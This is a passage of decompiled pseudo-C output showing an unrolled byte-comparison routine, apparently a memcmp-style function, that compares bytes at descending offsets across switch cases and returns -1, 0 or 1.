    																		__eflags = _t1270;
    																		if(_t1270 != 0) {
    																			__eflags = _t1270;
    																			_t405 = _t1270 > 0;
    																			__eflags = _t405;
    																			_t1270 = (0 | _t405) * 2 - 1;
    																		}
    																		__eflags = _t1270;
    																		if(_t1270 == 0) {
    																			_t1270 = ( *(_t1354 - 3) & 0x000000ff) - ( *(_t1340 - 3) & 0x000000ff);
    																			__eflags = _t1270;
    																			if(_t1270 != 0) {
    																				__eflags = _t1270;
    																				_t411 = _t1270 > 0;
    																				__eflags = _t411;
    																				_t1270 = (0 | _t411) * 2 - 1;
    																			}
    																			__eflags = _t1270;
    																			if(_t1270 == 0) {
    																				_t1270 = ( *(_t1354 - 2) & 0x000000ff) - ( *(_t1340 - 2) & 0x000000ff);
    																				__eflags = _t1270;
    																				if(_t1270 != 0) {
    																					__eflags = _t1270;
    																					_t417 = _t1270 > 0;
    																					__eflags = _t417;
    																					_t1270 = (0 | _t417) * 2 - 1;
    																				}
    																				__eflags = _t1270;
    																				if(_t1270 == 0) {
    																					_t1270 = ( *(_t1354 - 1) & 0x000000ff) - ( *(_t1340 - 1) & 0x000000ff);
    																					__eflags = _t1270;
    																					if(_t1270 != 0) {
    																						__eflags = _t1270;
    																						_t423 = _t1270 > 0;
    																						__eflags = _t423;
    																						_t1270 = (0 | _t423) * 2 - 1;
    																					}
    																					__eflags = _t1270;
    																					if(_t1270 == 0) {
    																						goto L227;
    																					}
    																				}
    																			}
    																		}
    																	}
    																	goto L228;
    																case 5:
    																	L307:
    																	__eax =  *(__esi - 5);
    																	__eflags =  *(__esi - 5) -  *(__edx - 5);
    																	if( *(__esi - 5) ==  *(__edx - 5)) {
    																		goto L320;
    																	} else {
    																		goto L308;
    																	}
    																	goto L528;
    																case 6:
    																	L400:
    																	__eax =  *(__esi - 6);
    																	__eflags =  *(__esi - 6) -  *(__edx - 6);
    																	if( *(__esi - 6) ==  *(__edx - 6)) {
    																		goto L413;
    																	} else {
    																		__ecx = __al & 0x000000ff;
    																		__eax =  *(__edx - 6) & 0x000000ff;
    																		__ecx = (__al & 0x000000ff) - ( *(__edx - 6) & 0x000000ff);
    																		__eflags = __ecx;
    																		if(__ecx != 0) {
    																			__eax = 0;
    																			__eflags = __ecx;
    																			_t764 = __ecx > 0;
    																			__eflags = _t764;
    																			__eax = 0 | _t764;
    																			__ecx = _t764 * 2 - 1;
    																		}
    																		__eflags = __ecx;
    																		if(__ecx != 0) {
    																			goto L228;
    																		} else {
    																			__ecx =  *(__esi - 5) & 0x000000ff;
    																			__eax =  *(__edx - 5) & 0x000000ff;
    																			__ecx = ( *(__esi - 5) & 0x000000ff) - ( *(__edx - 5) & 0x000000ff);
    																			__eflags = __ecx;
    																			if(__ecx != 0) {
    																				__eax = 0;
    																				__eflags = __ecx;
    																				_t770 = __ecx > 0;
    																				__eflags = _t770;
    																				__eax = 0 | _t770;
    																				__ecx = _t770 * 2 - 1;
    																			}
    																			__eflags = __ecx;
    																			if(__ecx != 0) {
    																				goto L228;
    																			} else {
    																				__ecx =  *(__esi - 4) & 0x000000ff;
    																				__eax =  *(__edx - 4) & 0x000000ff;
    																				__ecx = ( *(__esi - 4) & 0x000000ff) - ( *(__edx - 4) & 0x000000ff);
    																				__eflags = __ecx;
    																				if(__ecx != 0) {
    																					__eax = 0;
    																					__eflags = __ecx;
    																					_t776 = __ecx > 0;
    																					__eflags = _t776;
    																					__eax = 0 | _t776;
    																					__ecx = _t776 * 2 - 1;
    																				}
    																				__eflags = __ecx;
    																				if(__ecx != 0) {
    																					goto L228;
    																				} else {
    																					__ecx =  *(__esi - 3) & 0x000000ff;
    																					__eax =  *(__edx - 3) & 0x000000ff;
    																					__ecx = ( *(__esi - 3) & 0x000000ff) - ( *(__edx - 3) & 0x000000ff);
    																					__eflags = __ecx;
    																					if(__ecx != 0) {
    																						__eax = 0;
    																						__eflags = __ecx;
    																						_t782 = __ecx > 0;
    																						__eflags = _t782;
    																						__eax = 0 | _t782;
    																						__ecx = _t782 * 2 - 1;
    																					}
    																					__eflags = __ecx;
    																					if(__ecx != 0) {
    																						goto L228;
    																					} else {
    																						goto L413;
    																					}
    																				}
    																			}
    																		}
    																	}
    																	goto L528;
    																case 7:
    																	L493:
    																	__eax =  *(__esi - 7);
    																	__eflags =  *(__esi - 7) -  *(__edx - 7);
    																	if( *(__esi - 7) ==  *(__edx - 7)) {
    																		goto L314;
    																	} else {
    																		__eax =  *(__edx - 7) & 0x000000ff;
    																		__ecx =  *(__esi - 7) & 0x000000ff;
    																		__ecx = ( *(__esi - 7) & 0x000000ff) - ( *(__edx - 7) & 0x000000ff);
    																		__eflags = __ecx;
    																		if(__ecx != 0) {
    																			__eax = 0;
    																			__eflags = __ecx;
    																			_t943 = __ecx > 0;
    																			__eflags = _t943;
    																			__eax = 0 | _t943;
    																			__ecx = _t943 * 2 - 1;
    																		}
    																		__eflags = __ecx;
    																		if(__ecx != 0) {
    																			goto L228;
    																		} else {
    																			__ecx =  *(__esi - 6) & 0x000000ff;
    																			__eax =  *(__edx - 6) & 0x000000ff;
    																			__ecx = ( *(__esi - 6) & 0x000000ff) - ( *(__edx - 6) & 0x000000ff);
    																			__eflags = __ecx;
    																			if(__ecx != 0) {
    																				__eax = 0;
    																				__eflags = __ecx;
    																				_t949 = __ecx > 0;
    																				__eflags = _t949;
    																				__eax = 0 | _t949;
    																				__ecx = _t949 * 2 - 1;
    																			}
    																			__eflags = __ecx;
    																			if(__ecx != 0) {
    																				goto L228;
    																			} else {
    																				L308:
    																				__eax =  *(__edx - 5) & 0x000000ff;
    																				__ecx =  *(__esi - 5) & 0x000000ff;
    																				__ecx = ( *(__esi - 5) & 0x000000ff) - ( *(__edx - 5) & 0x000000ff);
    																				__eflags = __ecx;
    																				if(__ecx != 0) {
    																					__eax = 0;
    																					__eflags = __ecx;
    																					_t582 = __ecx > 0;
    																					__eflags = _t582;
    																					__eax = 0 | _t582;
    																					__ecx = _t582 * 2 - 1;
    																				}
    																				__eflags = __ecx;
    																				if(__ecx != 0) {
    																					goto L228;
    																				} else {
    																					__eax =  *(__edx - 4) & 0x000000ff;
    																					__ecx =  *(__esi - 4) & 0x000000ff;
    																					__ecx = ( *(__esi - 4) & 0x000000ff) - ( *(__edx - 4) & 0x000000ff);
    																					__eflags = __ecx;
    																					if(__ecx != 0) {
    																						__eax = 0;
    																						__eflags = __ecx;
    																						_t588 = __ecx > 0;
    																						__eflags = _t588;
    																						__eax = 0 | _t588;
    																						__ecx = _t588 * 2 - 1;
    																					}
    																					__eflags = __ecx;
    																					if(__ecx != 0) {
    																						goto L228;
    																					} else {
    																						goto L314;
    																					}
    																				}
    																			}
    																		}
    																	}
    																	goto L528;
    																case 8:
    																	L201:
    																	_t1062 =  *(_t1354 - 8);
    																	__eflags = _t1062 -  *(_t1340 - 8);
    																	if(_t1062 ==  *(_t1340 - 8)) {
    																		goto L214;
    																	} else {
    																		_t1270 = (_t1062 & 0x000000ff) - ( *(_t1340 - 8) & 0x000000ff);
    																		__eflags = _t1270;
    																		if(_t1270 != 0) {
    																			__eflags = _t1270;
    																			_t380 = _t1270 > 0;
    																			__eflags = _t380;
    																			_t1270 = (0 | _t380) * 2 - 1;
    																		}
    																		__eflags = _t1270;
    																		if(_t1270 == 0) {
    																			_t1270 = ( *(_t1354 - 7) & 0x000000ff) - ( *(_t1340 - 7) & 0x000000ff);
    																			__eflags = _t1270;
    																			if(_t1270 != 0) {
    																				__eflags = _t1270;
    																				_t386 = _t1270 > 0;
    																				__eflags = _t386;
    																				_t1270 = (0 | _t386) * 2 - 1;
    																			}
    																			__eflags = _t1270;
    																			if(_t1270 == 0) {
    																				_t1270 = ( *(_t1354 - 6) & 0x000000ff) - ( *(_t1340 - 6) & 0x000000ff);
    																				__eflags = _t1270;
    																				if(_t1270 != 0) {
    																					__eflags = _t1270;
    																					_t392 = _t1270 > 0;
    																					__eflags = _t392;
    																					_t1270 = (0 | _t392) * 2 - 1;
    																				}
    																				__eflags = _t1270;
    																				if(_t1270 == 0) {
    																					_t1270 = ( *(_t1354 - 5) & 0x000000ff) - ( *(_t1340 - 5) & 0x000000ff);
    																					__eflags = _t1270;
    																					if(_t1270 != 0) {
    																						__eflags = _t1270;
    																						_t398 = _t1270 > 0;
    																						__eflags = _t398;
    																						_t1270 = (0 | _t398) * 2 - 1;
    																					}
    																					__eflags = _t1270;
    																					if(_t1270 == 0) {
    																						goto L214;
    																					}
    																				}
    																			}
    																		}
    																	}
    																	goto L228;
    																case 9:
    																	L294:
    																	__eax =  *(__esi - 9);
    																	__eflags =  *(__esi - 9) -  *(__edx - 9);
    																	if( *(__esi - 9) ==  *(__edx - 9)) {
    																		goto L307;
    																	} else {
    																		__ecx = __al & 0x000000ff;
    																		__eax =  *(__edx - 9) & 0x000000ff;
    																		__ecx = (__al & 0x000000ff) - ( *(__edx - 9) & 0x000000ff);
    																		__eflags = __ecx;
    																		if(__ecx != 0) {
    																			__eax = 0;
    																			__eflags = __ecx;
    																			_t556 = __ecx > 0;
    																			__eflags = _t556;
    																			__eax = 0 | _t556;
    																			__ecx = _t556 * 2 - 1;
    																		}
    																		__eflags = __ecx;
    																		if(__ecx != 0) {
    																			goto L228;
    																		} else {
    																			__ecx =  *(__esi - 8) & 0x000000ff;
    																			__eax =  *(__edx - 8) & 0x000000ff;
    																			__ecx = ( *(__esi - 8) & 0x000000ff) - ( *(__edx - 8) & 0x000000ff);
    																			__eflags = __ecx;
    																			if(__ecx != 0) {
    																				__eax = 0;
    																				__eflags = __ecx;
    																				_t562 = __ecx > 0;
    																				__eflags = _t562;
    																				__eax = 0 | _t562;
    																				__ecx = _t562 * 2 - 1;
    																			}
    																			__eflags = __ecx;
    																			if(__ecx != 0) {
    																				goto L228;
    																			} else {
    																				__ecx =  *(__esi - 7) & 0x000000ff;
    																				__eax =  *(__edx - 7) & 0x000000ff;
    																				__ecx = ( *(__esi - 7) & 0x000000ff) - ( *(__edx - 7) & 0x000000ff);
    																				__eflags = __ecx;
    																				if(__ecx != 0) {
    																					__eax = 0;
    																					__eflags = __ecx;
    																					_t568 = __ecx > 0;
    																					__eflags = _t568;
    																					__eax = 0 | _t568;
    																					__ecx = _t568 * 2 - 1;
    																				}
    																				__eflags = __ecx;
    																				if(__ecx != 0) {
    																					goto L228;
    																				} else {
    																					__ecx =  *(__esi - 6) & 0x000000ff;
    																					__eax =  *(__edx - 6) & 0x000000ff;
    																					__ecx = ( *(__esi - 6) & 0x000000ff) - ( *(__edx - 6) & 0x000000ff);
    																					__eflags = __ecx;
    																					if(__ecx != 0) {
    																						__eax = 0;
    																						__eflags = __ecx;
    																						_t574 = __ecx > 0;
    																						__eflags = _t574;
    																						__eax = 0 | _t574;
    																						__ecx = _t574 * 2 - 1;
    																					}
    																					__eflags = __ecx;
    																					if(__ecx != 0) {
    																						goto L228;
    																					} else {
    																						goto L307;
    																					}
    																				}
    																			}
    																		}
    																	}
    																	goto L528;
    																case 0xa:
    																	L387:
    																	__eax =  *(__esi - 0xa);
    																	__eflags =  *(__esi - 0xa) -  *(__edx - 0xa);
    																	if( *(__esi - 0xa) ==  *(__edx - 0xa)) {
    																		goto L400;
    																	} else {
    																		__eax =  *(__edx - 0xa) & 0x000000ff;
    																		__ecx =  *(__esi - 0xa) & 0x000000ff;
    																		__ecx = ( *(__esi - 0xa) & 0x000000ff) - ( *(__edx - 0xa) & 0x000000ff);
    																		__eflags = __ecx;
    																		if(__ecx != 0) {
    																			__eax = 0;
    																			__eflags = __ecx;
    																			_t739 = __ecx > 0;
    																			__eflags = _t739;
    																			__eax = 0 | _t739;
    																			__ecx = _t739 * 2 - 1;
    																		}
    																		__eflags = __ecx;
    																		if(__ecx != 0) {
    																			goto L228;
    																		} else {
    																			__ecx =  *(__esi - 9) & 0x000000ff;
    																			__eax =  *(__edx - 9) & 0x000000ff;
    																			__ecx = ( *(__esi - 9) & 0x000000ff) - ( *(__edx - 9) & 0x000000ff);
    																			__eflags = __ecx;
    																			if(__ecx != 0) {
    																				__eax = 0;
    																				__eflags = __ecx;
    																				_t745 = __ecx > 0;
    																				__eflags = _t745;
    																				__eax = 0 | _t745;
    																				__ecx = _t745 * 2 - 1;
    																			}
    																			__eflags = __ecx;
    																			if(__ecx != 0) {
    																				goto L228;
    																			} else {
    																				__ecx =  *(__esi - 8) & 0x000000ff;
    																				__eax =  *(__edx - 8) & 0x000000ff;
    																				__ecx = ( *(__esi - 8) & 0x000000ff) - ( *(__edx - 8) & 0x000000ff);
    																				__eflags = __ecx;
    																				if(__ecx != 0) {
    																					__eax = 0;
    																					__eflags = __ecx;
    																					_t751 = __ecx > 0;
    																					__eflags = _t751;
    																					__eax = 0 | _t751;
    																					__ecx = _t751 * 2 - 1;
    																				}
    																				__eflags = __ecx;
    																				if(__ecx != 0) {
    																					goto L228;
    																				} else {
    																					__ecx =  *(__esi - 7) & 0x000000ff;
    																					__eax =  *(__edx - 7) & 0x000000ff;
    																					__ecx = ( *(__esi - 7) & 0x000000ff) - ( *(__edx - 7) & 0x000000ff);
    																					__eflags = __ecx;
    																					if(__ecx != 0) {
    																						__eax = 0;
    																						__eflags = __ecx;
    																						_t757 = __ecx > 0;
    																						__eflags = _t757;
    																						__eax = 0 | _t757;
    																						__ecx = _t757 * 2 - 1;
    																					}
    																					__eflags = __ecx;
    																					if(__ecx != 0) {
    																						goto L228;
    																					} else {
    																						goto L400;
    																					}
    																				}
    																			}
    																		}
    																	}
    																	goto L528;
    																case 0xb:
    																	L480:
    																	__eax =  *(__esi - 0xb);
    																	__eflags =  *(__esi - 0xb) -  *(__edx - 0xb);
    																	if( *(__esi - 0xb) ==  *(__edx - 0xb)) {
    																		goto L493;
    																	} else {
    																		__ecx = __al & 0x000000ff;
    																		__eax =  *(__edx - 0xb) & 0x000000ff;
    																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0xb) & 0x000000ff);
    																		__eflags = __ecx;
    																		if(__ecx != 0) {
    																			__eax = 0;
    																			__eflags = __ecx;
    																			_t917 = __ecx > 0;
    																			__eflags = _t917;
    																			__eax = 0 | _t917;
    																			__ecx = _t917 * 2 - 1;
    																		}
    																		__eflags = __ecx;
    																		if(__ecx != 0) {
    																			goto L228;
    																		} else {
    																			__ecx =  *(__esi - 0xa) & 0x000000ff;
    																			__eax =  *(__edx - 0xa) & 0x000000ff;
    																			__ecx = ( *(__esi - 0xa) & 0x000000ff) - ( *(__edx - 0xa) & 0x000000ff);
    																			__eflags = __ecx;
    																			if(__ecx != 0) {
    																				__eax = 0;
    																				__eflags = __ecx;
    																				_t923 = __ecx > 0;
    																				__eflags = _t923;
    																				__eax = 0 | _t923;
    																				__ecx = _t923 * 2 - 1;
    																			}
    																			__eflags = __ecx;
    																			if(__ecx != 0) {
    																				goto L228;
    																			} else {
    																				__ecx =  *(__esi - 9) & 0x000000ff;
    																				__eax =  *(__edx - 9) & 0x000000ff;
    																				__ecx = ( *(__esi - 9) & 0x000000ff) - ( *(__edx - 9) & 0x000000ff);
    																				__eflags = __ecx;
    																				if(__ecx != 0) {
    																					__eax = 0;
    																					__eflags = __ecx;
    																					_t929 = __ecx > 0;
    																					__eflags = _t929;
    																					__eax = 0 | _t929;
    																					__ecx = _t929 * 2 - 1;
    																				}
    																				__eflags = __ecx;
    																				if(__ecx != 0) {
    																					goto L228;
    																				} else {
    																					__ecx =  *(__esi - 8) & 0x000000ff;
    																					__eax =  *(__edx - 8) & 0x000000ff;
    																					__ecx = ( *(__esi - 8) & 0x000000ff) - ( *(__edx - 8) & 0x000000ff);
    																					__eflags = __ecx;
    																					if(__ecx != 0) {
    																						__eax = 0;
    																						__eflags = __ecx;
    																						_t935 = __ecx > 0;
    																						__eflags = _t935;
    																						__eax = 0 | _t935;
    																						__ecx = _t935 * 2 - 1;
    																					}
    																					__eflags = __ecx;
    																					if(__ecx != 0) {
    																						goto L228;
    																					} else {
    																						goto L493;
    																					}
    																				}
    																			}
    																		}
    																	}
    																	goto L528;
    																case 0xc:
    																	L188:
    																	_t1061 =  *(_t1354 - 0xc);
    																	__eflags = _t1061 -  *(_t1340 - 0xc);
    																	if(_t1061 ==  *(_t1340 - 0xc)) {
    																		goto L201;
    																	} else {
    																		_t1270 = (_t1061 & 0x000000ff) - ( *(_t1340 - 0xc) & 0x000000ff);
    																		__eflags = _t1270;
    																		if(_t1270 != 0) {
    																			__eflags = _t1270;
    																			_t355 = _t1270 > 0;
    																			__eflags = _t355;
    																			_t1270 = (0 | _t355) * 2 - 1;
    																		}
    																		__eflags = _t1270;
    																		if(_t1270 == 0) {
    																			_t1270 = ( *(_t1354 - 0xb) & 0x000000ff) - ( *(_t1340 - 0xb) & 0x000000ff);
    																			__eflags = _t1270;
    																			if(_t1270 != 0) {
    																				__eflags = _t1270;
    																				_t361 = _t1270 > 0;
    																				__eflags = _t361;
    																				_t1270 = (0 | _t361) * 2 - 1;
    																			}
    																			__eflags = _t1270;
    																			if(_t1270 == 0) {
    																				_t1270 = ( *(_t1354 - 0xa) & 0x000000ff) - ( *(_t1340 - 0xa) & 0x000000ff);
    																				__eflags = _t1270;
    																				if(_t1270 != 0) {
    																					__eflags = _t1270;
    																					_t367 = _t1270 > 0;
    																					__eflags = _t367;
    																					_t1270 = (0 | _t367) * 2 - 1;
    																				}
    																				__eflags = _t1270;
    																				if(_t1270 == 0) {
    																					_t1270 = ( *(_t1354 - 9) & 0x000000ff) - ( *(_t1340 - 9) & 0x000000ff);
    																					__eflags = _t1270;
    																					if(_t1270 != 0) {
    																						__eflags = _t1270;
    																						_t373 = _t1270 > 0;
    																						__eflags = _t373;
    																						_t1270 = (0 | _t373) * 2 - 1;
    																					}
    																					__eflags = _t1270;
    																					if(_t1270 == 0) {
    																						goto L201;
    																					}
    																				}
    																			}
    																		}
    																	}
    																	goto L228;
    																case 0xd:
    																	L281:
    																	__eax =  *(__esi - 0xd);
    																	__eflags =  *(__esi - 0xd) -  *(__edx - 0xd);
    																	if( *(__esi - 0xd) ==  *(__edx - 0xd)) {
    																		goto L294;
    																	} else {
    																		__ecx = __al & 0x000000ff;
    																		__eax =  *(__edx - 0xd) & 0x000000ff;
    																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0xd) & 0x000000ff);
    																		__eflags = __ecx;
    																		if(__ecx != 0) {
    																			__eax = 0;
    																			__eflags = __ecx;
    																			_t531 = __ecx > 0;
    																			__eflags = _t531;
    																			__eax = 0 | _t531;
    																			__ecx = _t531 * 2 - 1;
    																		}
    																		__eflags = __ecx;
    																		if(__ecx != 0) {
    																			goto L228;
    																		} else {
    																			__ecx =  *(__esi - 0xc) & 0x000000ff;
    																			__eax =  *(__edx - 0xc) & 0x000000ff;
    																			__ecx = ( *(__esi - 0xc) & 0x000000ff) - ( *(__edx - 0xc) & 0x000000ff);
    																			__eflags = __ecx;
    																			if(__ecx != 0) {
    																				__eax = 0;
    																				__eflags = __ecx;
    																				_t537 = __ecx > 0;
    																				__eflags = _t537;
    																				__eax = 0 | _t537;
    																				__ecx = _t537 * 2 - 1;
    																			}
    																			__eflags = __ecx;
    																			if(__ecx != 0) {
    																				goto L228;
    																			} else {
    																				__ecx =  *(__esi - 0xb) & 0x000000ff;
    																				__eax =  *(__edx - 0xb) & 0x000000ff;
    																				__ecx = ( *(__esi - 0xb) & 0x000000ff) - ( *(__edx - 0xb) & 0x000000ff);
    																				__eflags = __ecx;
    																				if(__ecx != 0) {
    																					__eax = 0;
    																					__eflags = __ecx;
    																					_t543 = __ecx > 0;
    																					__eflags = _t543;
    																					__eax = 0 | _t543;
    																					__ecx = _t543 * 2 - 1;
    																				}
    																				__eflags = __ecx;
    																				if(__ecx != 0) {
    																					goto L228;
    																				} else {
    																					__ecx =  *(__esi - 0xa) & 0x000000ff;
    																					__eax =  *(__edx - 0xa) & 0x000000ff;
    																					__ecx = ( *(__esi - 0xa) & 0x000000ff) - ( *(__edx - 0xa) & 0x000000ff);
    																					__eflags = __ecx;
    																					if(__ecx != 0) {
    																						__eax = 0;
    																						__eflags = __ecx;
    																						_t549 = __ecx > 0;
    																						__eflags = _t549;
    																						__eax = 0 | _t549;
    																						__ecx = _t549 * 2 - 1;
    																					}
    																					__eflags = __ecx;
    																					if(__ecx != 0) {
    																						goto L228;
    																					} else {
    																						goto L294;
    																					}
    																				}
    																			}
    																		}
    																	}
    																	goto L528;
    																case 0xe:
    																	L374:
    																	__eax =  *(__esi - 0xe);
    																	__eflags =  *(__esi - 0xe) -  *(__edx - 0xe);
    																	if( *(__esi - 0xe) ==  *(__edx - 0xe)) {
    																		goto L387;
    																	} else {
    																		__ecx = __al & 0x000000ff;
    																		__eax =  *(__edx - 0xe) & 0x000000ff;
    																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0xe) & 0x000000ff);
    																		__eflags = __ecx;
    																		if(__ecx != 0) {
    																			__eax = 0;
    																			__eflags = __ecx;
    																			_t713 = __ecx > 0;
    																			__eflags = _t713;
    																			__eax = 0 | _t713;
    																			__ecx = _t713 * 2 - 1;
    																		}
    																		__eflags = __ecx;
    																		if(__ecx != 0) {
    																			goto L228;
    																		} else {
    																			__ecx =  *(__esi - 0xd) & 0x000000ff;
    																			__eax =  *(__edx - 0xd) & 0x000000ff;
    																			__ecx = ( *(__esi - 0xd) & 0x000000ff) - ( *(__edx - 0xd) & 0x000000ff);
    																			__eflags = __ecx;
    																			if(__ecx != 0) {
    																				__eax = 0;
    																				__eflags = __ecx;
    																				_t719 = __ecx > 0;
    																				__eflags = _t719;
    																				__eax = 0 | _t719;
    																				__ecx = _t719 * 2 - 1;
    																			}
    																			__eflags = __ecx;
    																			if(__ecx != 0) {
    																				goto L228;
    																			} else {
    																				__ecx =  *(__esi - 0xc) & 0x000000ff;
    																				__eax =  *(__edx - 0xc) & 0x000000ff;
    																				__ecx = ( *(__esi - 0xc) & 0x000000ff) - ( *(__edx - 0xc) & 0x000000ff);
    																				__eflags = __ecx;
    																				if(__ecx != 0) {
    																					__eax = 0;
    																					__eflags = __ecx;
    																					_t725 = __ecx > 0;
    																					__eflags = _t725;
    																					__eax = 0 | _t725;
    																					__ecx = _t725 * 2 - 1;
    																				}
    																				__eflags = __ecx;
    																				if(__ecx != 0) {
    																					goto L228;
    																				} else {
    																					__ecx =  *(__esi - 0xb) & 0x000000ff;
    																					__eax =  *(__edx - 0xb) & 0x000000ff;
    																					__ecx = ( *(__esi - 0xb) & 0x000000ff) - ( *(__edx - 0xb) & 0x000000ff);
    																					__eflags = __ecx;
    																					if(__ecx != 0) {
    																						__eax = 0;
    																						__eflags = __ecx;
    																						_t731 = __ecx > 0;
    																						__eflags = _t731;
    																						__eax = 0 | _t731;
    																						__ecx = _t731 * 2 - 1;
    																					}
    																					__eflags = __ecx;
    																					if(__ecx != 0) {
    																						goto L228;
    																					} else {
    																						goto L387;
    																					}
    																				}
    																			}
    																		}
    																	}
    																	goto L528;
    																case 0xf:
    																	L467:
    																	__eax =  *(__esi - 0xf);
    																	__eflags =  *(__esi - 0xf) -  *(__edx - 0xf);
    																	if( *(__esi - 0xf) ==  *(__edx - 0xf)) {
    																		goto L480;
    																	} else {
    																		__ecx = __al & 0x000000ff;
    																		__eax =  *(__edx - 0xf) & 0x000000ff;
    																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0xf) & 0x000000ff);
    																		__eflags = __ecx;
    																		if(__ecx != 0) {
    																			__eax = 0;
    																			__eflags = __ecx;
    																			_t892 = __ecx > 0;
    																			__eflags = _t892;
    																			__eax = 0 | _t892;
    																			__ecx = _t892 * 2 - 1;
    																		}
    																		__eflags = __ecx;
    																		if(__ecx != 0) {
    																			goto L228;
    																		} else {
    																			__ecx =  *(__esi - 0xe) & 0x000000ff;
    																			__eax =  *(__edx - 0xe) & 0x000000ff;
    																			__ecx = ( *(__esi - 0xe) & 0x000000ff) - ( *(__edx - 0xe) & 0x000000ff);
    																			__eflags = __ecx;
    																			if(__ecx != 0) {
    																				__eax = 0;
    																				__eflags = __ecx;
    																				_t898 = __ecx > 0;
    																				__eflags = _t898;
    																				__eax = 0 | _t898;
    																				__ecx = _t898 * 2 - 1;
    																			}
    																			__eflags = __ecx;
    																			if(__ecx != 0) {
    																				goto L228;
    																			} else {
    																				__ecx =  *(__esi - 0xd) & 0x000000ff;
    																				__eax =  *(__edx - 0xd) & 0x000000ff;
    																				__ecx = ( *(__esi - 0xd) & 0x000000ff) - ( *(__edx - 0xd) & 0x000000ff);
    																				__eflags = __ecx;
    																				if(__ecx != 0) {
    																					__eax = 0;
    																					__eflags = __ecx;
    																					_t904 = __ecx > 0;
    																					__eflags = _t904;
    																					__eax = 0 | _t904;
    																					__ecx = _t904 * 2 - 1;
    																				}
    																				__eflags = __ecx;
    																				if(__ecx != 0) {
    																					goto L228;
    																				} else {
    																					__ecx =  *(__esi - 0xc) & 0x000000ff;
    																					__eax =  *(__edx - 0xc) & 0x000000ff;
    																					__ecx = ( *(__esi - 0xc) & 0x000000ff) - ( *(__edx - 0xc) & 0x000000ff);
    																					__eflags = __ecx;
    																					if(__ecx != 0) {
    																						__eax = 0;
    																						__eflags = __ecx;
    																						_t910 = __ecx > 0;
    																						__eflags = _t910;
    																						__eax = 0 | _t910;
    																						__ecx = _t910 * 2 - 1;
    																					}
    																					__eflags = __ecx;
    																					if(__ecx != 0) {
    																						goto L228;
    																					} else {
    																						goto L480;
    																					}
    																				}
    																			}
    																		}
    																	}
    																	goto L528;
    																case 0x10:
    																	L175:
    																	_t1060 =  *(_t1354 - 0x10);
    																	__eflags = _t1060 -  *(_t1340 - 0x10);
    																	if(_t1060 ==  *(_t1340 - 0x10)) {
    																		goto L188;
    																	} else {
    																		_t1270 = (_t1060 & 0x000000ff) - ( *(_t1340 - 0x10) & 0x000000ff);
    																		__eflags = _t1270;
    																		if(_t1270 != 0) {
    																			__eflags = _t1270;
    																			_t330 = _t1270 > 0;
    																			__eflags = _t330;
    																			_t1270 = (0 | _t330) * 2 - 1;
    																		}
    																		__eflags = _t1270;
    																		if(_t1270 == 0) {
    																			_t1270 = ( *(_t1354 - 0xf) & 0x000000ff) - ( *(_t1340 - 0xf) & 0x000000ff);
    																			__eflags = _t1270;
    																			if(_t1270 != 0) {
    																				__eflags = _t1270;
    																				_t336 = _t1270 > 0;
    																				__eflags = _t336;
    																				_t1270 = (0 | _t336) * 2 - 1;
    																			}
    																			__eflags = _t1270;
    																			if(_t1270 == 0) {
    																				_t1270 = ( *(_t1354 - 0xe) & 0x000000ff) - ( *(_t1340 - 0xe) & 0x000000ff);
    																				__eflags = _t1270;
    																				if(_t1270 != 0) {
    																					__eflags = _t1270;
    																					_t342 = _t1270 > 0;
    																					__eflags = _t342;
    																					_t1270 = (0 | _t342) * 2 - 1;
    																				}
    																				__eflags = _t1270;
    																				if(_t1270 == 0) {
    																					_t1270 = ( *(_t1354 - 0xd) & 0x000000ff) - ( *(_t1340 - 0xd) & 0x000000ff);
    																					__eflags = _t1270;
    																					if(_t1270 != 0) {
    																						__eflags = _t1270;
    																						_t348 = _t1270 > 0;
    																						__eflags = _t348;
    																						_t1270 = (0 | _t348) * 2 - 1;
    																					}
    																					__eflags = _t1270;
    																					if(_t1270 == 0) {
    																						goto L188;
    																					}
    																				}
    																			}
    																		}
    																	}
    																	goto L228;
    																case 0x11:
    																	L268:
    																	__eax =  *(__esi - 0x11);
    																	__eflags =  *(__esi - 0x11) -  *(__edx - 0x11);
    																	if( *(__esi - 0x11) ==  *(__edx - 0x11)) {
    																		goto L281;
    																	} else {
    																		__ecx = __al & 0x000000ff;
    																		__eax =  *(__edx - 0x11) & 0x000000ff;
    																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x11) & 0x000000ff);
    																		__eflags = __ecx;
    																		if(__ecx != 0) {
    																			__eax = 0;
    																			__eflags = __ecx;
    																			_t506 = __ecx > 0;
    																			__eflags = _t506;
    																			__eax = 0 | _t506;
    																			__ecx = _t506 * 2 - 1;
    																		}
    																		__eflags = __ecx;
    																		if(__ecx != 0) {
    																			goto L228;
    																		} else {
    																			__ecx =  *(__esi - 0x10) & 0x000000ff;
    																			__eax =  *(__edx - 0x10) & 0x000000ff;
    																			__ecx = ( *(__esi - 0x10) & 0x000000ff) - ( *(__edx - 0x10) & 0x000000ff);
    																			__eflags = __ecx;
    																			if(__ecx != 0) {
    																				__eax = 0;
    																				__eflags = __ecx;
    																				_t512 = __ecx > 0;
    																				__eflags = _t512;
    																				__eax = 0 | _t512;
    																				__ecx = _t512 * 2 - 1;
    																			}
    																			__eflags = __ecx;
    																			if(__ecx != 0) {
    																				goto L228;
    																			} else {
    																				__ecx =  *(__esi - 0xf) & 0x000000ff;
    																				__eax =  *(__edx - 0xf) & 0x000000ff;
    																				__ecx = ( *(__esi - 0xf) & 0x000000ff) - ( *(__edx - 0xf) & 0x000000ff);
    																				__eflags = __ecx;
    																				if(__ecx != 0) {
    																					__eax = 0;
    																					__eflags = __ecx;
    																					_t518 = __ecx > 0;
    																					__eflags = _t518;
    																					__eax = 0 | _t518;
    																					__ecx = _t518 * 2 - 1;
    																				}
    																				__eflags = __ecx;
    																				if(__ecx != 0) {
    																					goto L228;
    																				} else {
    																					__ecx =  *(__esi - 0xe) & 0x000000ff;
    																					__eax =  *(__edx - 0xe) & 0x000000ff;
    																					__ecx = ( *(__esi - 0xe) & 0x000000ff) - ( *(__edx - 0xe) & 0x000000ff);
    																					__eflags = __ecx;
    																					if(__ecx != 0) {
    																						__eax = 0;
    																						__eflags = __ecx;
    																						_t524 = __ecx > 0;
    																						__eflags = _t524;
    																						__eax = 0 | _t524;
    																						__ecx = _t524 * 2 - 1;
    																					}
    																					__eflags = __ecx;
    																					if(__ecx != 0) {
    																						goto L228;
    																					} else {
    																						goto L281;
    																					}
